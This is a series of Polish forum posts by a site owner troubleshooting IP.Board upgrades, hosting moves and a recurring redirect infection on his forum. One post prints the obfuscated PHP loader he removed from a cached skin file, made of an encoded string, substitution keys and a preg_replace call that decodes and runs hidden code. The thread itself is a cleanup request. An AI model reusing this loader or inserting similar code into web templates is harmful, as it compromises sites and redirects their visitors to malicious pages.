Obcy

Pomogło. Dziękuję

Dzis odpalilem aktualizację 4.2.9 -> 4.3.3 na kroku 4 z 5 pasek dochodzi do konca i wraca do kroku 1. Ponowna próba aktualizacji także przerzuca do kroku 1 tym razem zaraz po podaniu danych do IPS. Po wejściu na forum oczywiście błąd. Brak wpisów w bazie. Kod błędu: EX1054 SELECT * FROM `core_profile_steps` ORDER BY step_position ASC IPS\Db\Exception: Unknown column 'step_position' in 'order clause' (1054) #0 /home/xxx/xxx/andriskos.pl/public_html/system/Db/Select.php(378): IPS\_Db->preparedQuery('/*IPS\\Member\\_P...', Array, true) #1 /home/xxx/xxx/andriskos.pl/public_html/system/Db/Select.php(276): IPS\Db\_Select->runQuery() #2 /home/xxx/xxx/andriskos.pl/public_html/system/Member/ProfileStep.php(127): IPS\Db\_Select->setKeyField('step_id') #3 /home/xxx/xxx/andriskos.pl/public_html/system/Member/ProfileStep.php(286): IPS\Member\_ProfileStep::getStore() #4 /home/xxx/xxx/andriskos.pl/public_html/system/Member/Member.php(4721): IPS\Member\_ProfileStep::loadAll() #5 /home/xxx/xxx/andriskos.pl/public_html/system/Dispatcher/Front.php(193): IPS\_Member->profileCompletion() #6 /home/xxx/xxx/andriskos.pl/public_html/system/Dispatcher/Dispatcher.php(103): IPS\Dispatcher\_Front->init() #7 /home/xxx/xxx/andriskos.pl/public_html/index.php(13): IPS\_Dispatcher::i() #8 {main} Jak poprawnie przeprowadzić tą aktualkę, lub jak doprowadzić forum do stanu używalności po upgrade?

czysta instalka + przepięcie na stara bazę.... wszystko hula

patent z htacces nie działa. Przepiałem sie na stary serwer ale w ACP nie widzę nic od GZIP.....oślepłem?

Suport ustalil, że problemem jest włączony gzip w aplikacji. Pytanie: Jak wylaczyc gzip z poziomu ftp / phpmyadmin ?

Serwerownia to dhosting....wymagania wszystkie na zielono. Pliki ze starej serwerowni ponownie przeniosłem - bez zmian Czy z paczki z CA mam wrzucić wszystkie pliki?

Dzis po przeniesieniu sie na inny hosting ujrzałem hieroglify (screen lub andriskos.pl) Zupełnie nie wiem od czego zacząć diagnostykę. Widzę to pierwszy raz a przenosiny to u mnie nie nowość. Proszę o sugestie. EDIT dalem w zlym dziale, mam najnowsze IPB - prosze o przeniesienie

Dokładnie, wszystko gra.

@DawPi Po instalacji pluginu nie ma, albo nie widze opcji do czyszczenia cache (o ile sie orientuje powinna byc u gory) @manius1988 czyli co ? Mam isc, pobrac paczke IPS4 i nadpisac pliki ?

Aktualizacja przez opcje aktualizuj, na żywym organizmie bez bledow....... i zgadnij co...... nie zrobiłem backupu (chyba ze wykonuje się on sam przed upgrade)

Po wykonaniu upgrade do v 4.1.17.1 wywalilo mi forum. Wygląda jakby wycięło z kodu wszystkie css. Dodatkowo forum nie wyszło z trybu Maintenance. Mój ACP wygląda jak na zalaczonym obrazku. Chcialem poczyscic cache i skiny ale nie potrafie sie teraz tam odnaleźć. Będę wdzięczny za podesłanie bezpośrednich url do opcji czyszczących. Mam nadzieje, że to coś da. EDIT: zero poprawy po wykonaniu tego acp>>system>>support>>option: Something isn't working correctly. Run that and it wil clearing the bad data.

Przepraszam za upierdliwość level hard. Poniżej wklejam zawartość z dwóch szablonów jakie mam zainstalowane. Czy są one czyste ? Wygląd > Zarządzaj stylami i szablonami > Zarządzaj szablonami w IP.Board > includeJS Wygląd > Zarządzaj stylami i szablonami > Zarządzaj szablonami w Andriskos > includeJS <if test="minifyjs:|:$this->settings['use_minify']"> <if test="remoteloadjs:|:$this->settings['remote_load_js']"> <script type='text/javascript' src='<if test="usehttpsprototype:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script> <script type='text/javascript' src='<if test="usehttpsscriptaculous:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script> <else /> <script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&g=js'></script> </if> <script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&charset={$this->settings['gb_char_set']}&f={parse expression="PUBLIC_DIRECTORY"}/js/ipb.js,cache/lang_cache/{$this->lang->lang_id}/ipb.lang.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.hovercard.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.quickpm.js<if test="hasjsmodules:|:count($jsModules)">,{parse expression="PUBLIC_DIRECTORY"}/js/ips.{parse expression="implode('.js,' . PUBLIC_DIRECTORY . '/js/ips.', array_unique( array_keys( $jsModules ) ) )"}.js</if>' charset='{$this->settings['gb_char_set']}'></script> <else /> <if test="nominifyremoteloadjs:|:$this->settings['remote_load_js']"> <script type='text/javascript' src='<if test="nmusehttpsp:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script> <else /> <script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/prototype.js'></script> </if> <script type='text/javascript' src='{$this->settings['js_base_url']}js/ipb.js?ipbv={$this->registry->output->antiCacheHash}&load=quickpm,hovercard,{parse expression="implode(',', array_unique( array_keys( $jsModules ) ) )"}'></script> <if test="nominifyremoteloadjs2:|:$this->settings['remote_load_js']"> <script type='text/javascript' src='<if test="nmusehttpss:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script> <else /> <script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/scriptaculous/scriptaculous-cache.js'></script> </if> <script type="text/javascript" src='{$this->settings['cache_dir']}lang_cache/{$this->lang->lang_id}/ipb.lang.js?nck={$this->settings['noCacheKey']}' charset='{$this->settings['gb_char_set']}'></script> </if> {parse template="liveEditJs" group="global"} <if test="isLargeTouch:|:$this->registry->output->isLargeTouchDevice()"> <script type="text/javascript" src='{$this->settings['js_base_url']}js/3rd_party/iscroll/iscroll.js'></script> </if> <if test="minifyjs:|:$this->settings['use_minify']"> <if test="remoteloadjs:|:$this->settings['remote_load_js']"> <script type='text/javascript' src='<if test="usehttpsprototype:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script> <script type='text/javascript' src='<if test="usehttpsscriptaculous:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script> <else /> <script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&g=js'></script> </if> <script type='text/javascript' src='{$this->settings['js_base_url']}min/index.php?ipbv={$this->registry->output->antiCacheHash}&charset={$this->settings['gb_char_set']}&f={parse expression="PUBLIC_DIRECTORY"}/js/ipb.js,cache/lang_cache/{$this->lang->lang_id}/ipb.lang.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.hovercard.js,{parse expression="PUBLIC_DIRECTORY"}/js/ips.quickpm.js<if test="hasjsmodules:|:count($jsModules)">,{parse expression="PUBLIC_DIRECTORY"}/js/ips.{parse expression="implode('.js,' . PUBLIC_DIRECTORY . '/js/ips.', array_unique( array_keys( $jsModules ) ) )"}.js</if>' charset='{$this->settings['gb_char_set']}'></script> <else /> <if test="nominifyremoteloadjs:|:$this->settings['remote_load_js']"> <script type='text/javascript' src='<if test="nmusehttpsp:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js'></script> <else /> <script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/prototype.js'></script> </if> <script type='text/javascript' src='{$this->settings['js_base_url']}js/ipb.js?ipbv={$this->registry->output->antiCacheHash}&load=quickpm,hovercard,{parse expression="implode(',', array_unique( array_keys( $jsModules ) ) )"}'></script> <if test="nominifyremoteloadjs2:|:$this->settings['remote_load_js']"> <script type='text/javascript' src='<if test="nmusehttpss:|:$this->registry->output->isHTTPS">https<else />http</if>://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/scriptaculous.js?load=effects,dragdrop,builder'></script> <else /> <script type='text/javascript' src='{$this->settings['js_base_url']}js/3rd_party/scriptaculous/scriptaculous-cache.js'></script> </if> <script type="text/javascript" src='{$this->settings['cache_dir']}lang_cache/{$this->lang->lang_id}/ipb.lang.js?nck={$this->settings['noCacheKey']}' charset='{$this->settings['gb_char_set']}'></script> </if> {parse template="liveEditJs" group="global"} <if test="isLargeTouch:|:$this->registry->output->isLargeTouchDevice()"> <script type="text/javascript" src='{$this->settings['js_base_url']}js/3rd_party/iscroll/iscroll.js'></script> </if> <!-- tomchristian.co.uk Custom JS --> <script type="text/javascript"> isjQuery = false; if (!window.jQuery) { document.write("<" + "script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'></" + "script>"); isjQuery = true; } </script> <script type="text/javascript"> if(isjQuery){ tcJq = jQuery.noConflict(); } else { tcJq = jQuery; } </script> <script type="text/javascript" src="{$this->settings['img_url']}/_custom/js/main.js"></script> <script type='text/javascript' src='{$this->settings['img_url']}/_custom/colorPicker/js/colorpicker.js'></script>

Przepraszam, że oddzielny post, ale chciałem aby to nie umknęło. Raport z AI-Bolit http://andriskos.pl/banery/raport.rar Ja z tego nic nie mogę wyłuskać

Dokładnie problem taki jak moj. Moim bledem bylo niezaaplikowanie laty na czas...a gdy to zrobilem to już było "po zawodach" SSy z procesów wklejam poniżej, ja nie widzę tam nic podejrzanego. http://prntscr.com/65ta56 http://prntscr.com/65tab0 http://prntscr.com/65tafz http://prntscr.com/65tanq Tak, to VPS więc zapuściłem AI-Bolit ze strony, którą dałeś ETA: 1h40m - zobaczymy co znajdzie. Z tym, że tam max wersja ipb to 3.3.4 ale może coś wylezie. Support odpisał mi, że infekcjami sie nie zajmuje i mam sam sobie radzić. EDIT do FTP mam dostęp tylko ja. Natomiast jest drugi admin z full dostępem do ACP....

@DawPi @jurij Zastosowałem się do Waszych rad, ale niestety to coś powraca. Z nowości na które naprowadziła mnie moja moderatorka: Stwierdziła ona, że Infekcja wraca w poniedziałki. I rzeczywiście bo wczoraj było ok a dziś już znowu jest redirect. Dodatkowo skin_global.php ma inną datę niż zaraz po tym jak go edytowałem i wywaliłem dziwny kod. Zerknąłem w ACP-zadania i jedyne co się wykonuje w poniedziałki o 3 rano to - Minify Cleanup Clean out old files created by minify. Jest coraz więcej śladów gdzie tego syfu szukać, ale sam sobie nie poradzę. Może teraz WY mądre głowy jakoś mi pomożecie.

Po pomocy DawPi było 2-3 dni spokoju. Doinstalowałem: SB, dzwiek do sb, skin, język pl. I znowu mam syf w /cache/skin_cache/cacheid_19/skin_global.php Syf usunąłem a wyglądał tak: $pk='bdc088c99ad373bb3d0c2d8c378459f8'; $rsa='o/2`B3b2go0viFoy@FoBP:UJP#`82|JGar<sj#`zK:a}bz=D2]J8r#|v2r=DyAuU2EU(oA&(K*FU2r=Qb:kCr#|AyzJAyAyge*U5P:U@P#L/a}J`ysP/yses>9f(j[}(anT(y[=`F*uUr}%_Z}&bP,%!rEU(araTb*Tn;r=`=t&"a:|tb#&`K,=Dy`JAb[<LeAuUr}%_Z}&bP,%!rEU(KRgUFR}fy,P`a}JW;r&t2*usp#P/F,LGy:`UarP$;[PTF#L$y#L}ys%$o]k8a:|vp#Us>*&"ZD|E|U|E]AFp|k&<r}|R&|P"<ZFkR`<srEU5P:;J<,%Tys=`r[|Ab*uUr}=kZ`akZ`gsEk&ZZkJE&ZakZU|EP}D(jA&t_ZfUa`gs2:JGF*FFjA&A_Z%Qyz|sr#}TF:=@K*ytb:`#a|Q8;#JW":F/b#Fga|Q8",`T2:J/r*C$;z`8aACtb#}$o]k8a:|vr*CAFrLA;]}nb:|Ar*CAFrLn;]`UF|Q8":aT;#|nb#J!r*C$2]CGF:ksyzkWr*C$F:`8or|AbkQ8":P(FkQ8b,Ut2EygP:e(",QU;GDJP[<8;#$sjA&@_E&"ZD|E|U|E]AFp|k&<rDT_Z}<srRgU;tDUF:T(yAD6yT!Bv[Y6y#|DF:`8a[=bP#=/b#W(a|J(a*FFjA&s_E&n>nFGar=G2]J8r#`UPGgUaRDU;nvsb:k8a}J(a*y5P:<Ja]}QF,U@PkJR&|P]&|PbPDTZ|k%"]kJ=R}@srEU52];@a]}QF,U@PkJ9RDJ>EZ|bP:|FKE`52];@2r=Gar<@PkJ,&|&bP#`Q;s;srEUzPnuTa]}QF,U@PkJ,&|&bP#ysrEU(Pn;@p]|Wy,&CK*&"<DJ_ED`k]A&srEU(KrW(anuU;GDJP:u(o#`zK*&UKr=`F:=/b#W(aEuUaEQsa]vs>,&(b]Z@KEgG=tfQe*U5P:DJy[|ny[&AK:}U=EuU2*Uge*QvKRWQyz`8F*una:JtF]}`bs<8b:Jt;r&(b#vJP#TDF,f0>AJz2]L`y[&/yzZGet-8;#JW>#&/F#Cgb#kU>s%@y9J(a9}5P:}JPAp(j[}`o:`Dj[}(anu@pE&}KE;zP,p(oA&PZ-Pp|-}e>tDn_,=tyz`QF*%Dor%`_EFDarTD>#(TFzkG;[P(y,<sp,=A;GDsoA&D2:`G>RCGar&D2]Csy}gs;zJTyz&"FrPgP}}J>#`8a:|v>s%@y9J(y:P#_rgUF:T(yAD6yT!Bv[Y6yz|s2r=DysUW_zJ}F,%}F*D6yT!Bv[Y6;]CD2Z=T;#T`E:kG2,Dz;]}Qj#yJ2ses_tQ/y#=A2r%D_np5"rDYY.'; $pka='0}9J8<ie?.4m-/Vulk&bI7W+^E>X,GOM5L$`"|vnBTzc%*oFRA2s]@6tqaPUw3[dZ;~DQyfCp{=#jHgS(1rh:YN_)!Kx'; $pkb='61D9uQ_M&;`!Evqg,FRb$<t:/SL?Hz^*7x8lfV4i(hm}BCedTyanWo.j{ZJk#@3~UY"0wcA5I+N2O>s]p%X|G)-P=rK['; $f='%t%'.substr($rsa,566,1); $klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html'); Jedyne co mi się nasuwa to to, że to coś siedzi w bazie i wraca przy rebuildzie skina. Nie mam już siły na to...i uprzedzając hejty, nie stać mnie na płatną pomoc (utrzymuję się z renty) Czy ktoś może mi poradzić jak pozbyć się tego raz na zawsze ?

Moje wyczyny pomińmy. Chciałem mieć pewność czystych plików. Zasadnicze pytanie: czy to co zrobiłem (opis wyżej) gwarantuje, że ten syf został usunięty z serwera ? Bo jeśli tak to idę zaraz na łapka (system świeży, zabezpieczony) i stamtąd jeszcze raz zmienię hasła i wrzucę świeże pliki. @Juri to, że masz większą wiedzę nie obliguje Cie do bycia szorstkim.

Dalej mam ten syf. Opiszę co robiłem po kolei. Liczę na pomoc bo mi juz brakuje wiedzy / pomysłów jak się tego pozbyć. 1. Odinstalowałem na forum wszystkie dodatki (aby po wrzuceniu świeżych plików nie mieć odwołań do nieistniejących ma FTP pluginów) 2. Wywaliłem wszystkie pliki z FTP. 3. Zmieniłem hasła do DirectAdmina, Bazy, FTP. 4. Wrzuciłem czystą paczkę z client area i zainstalowałem na nowej bazie. 5. Przepiałem się na starą bazę. 6. Przerzuciłem z backupu niezbędne obrazki, zwracając uwagę aby były to tylko i wyłącznie pliki graficzne (logo, rangi, emoty, katalog z grafikami dodatkowymi [banery, belki i inne takie]) Po dwóch dniach znowu mam przekierowania WinMerge wywala mi zbyt dużo różnic abym mógł to sam ogarnąć. Większość w /cache. Mam raport z WinMerge jeśli ktoś zechciałby zerknąć. Czy jest coś jeszcze co mógłbym zrobić aby pozbyć się tego syfu? A może to ja mam syf na PC i sam infekuje stronę / mam wycieki haseł ? Podpowiedzcie coś proszę.

Odinstalowałem seopilot i prolink. Przeinstalowałem skina + upgrade do 3.4.7. Póki co ustało. Zobaczymy co dalej bedzie.

Mam sobie forum andriskos.pl . Ludzie ostatnio zaczeli mnie informować, że zanim wejdą na stronę to im się dziwne rzeczy pokazują. Zacząłem dopytywać i wygląda to tak: 1. Odpalają google i wpisują "andriskos" 2. W wynikach klikają na link odsyłający do forum, ale zamiast tego odpalają się rózne strony. Przetestowałem to i rzeczywiście raz (wyglada na to, że raz dziennie) mnie przekierowało na http://filestore321.com/download.php?id=1838a21b Wygląda, że coś załapałem, ale nie bardzo wiem gdzie szukać infekcji. Na forum mam zainstalowane seopilot i prolink. Moze to one robią takie jaja? Mądre głowy, help.

Na forum zaczęły pisać mi boty w postaci gościa. Nie bardzo wiem jak to możliwe i jak temu zaradzić. Skrypt najnowszy z wszystkimi łatami. http://prntscr.com/39v40q H E L P

Dziękuję wszystkim za pomoc. Winowajcą rzeczywiście okazał sie (TB) Group Format 4.1.1 + zle CHMODy na /hooks. To najwidoczniej przyczyniało sie do złego odinstalowywania moda i w efekcie do errorów po deinstalacji. Teraz nawet tymczasowa poprawka od kolegi insp działa. Jeszcze raz dziękuję

Zacznę od wyłączania hookow po kolei. Może to coś da. Ale to już jutro. Proszę o niezamykanie tematu. Dam znać o efektach

Zaktualizowany. Tak jest na każdym stylu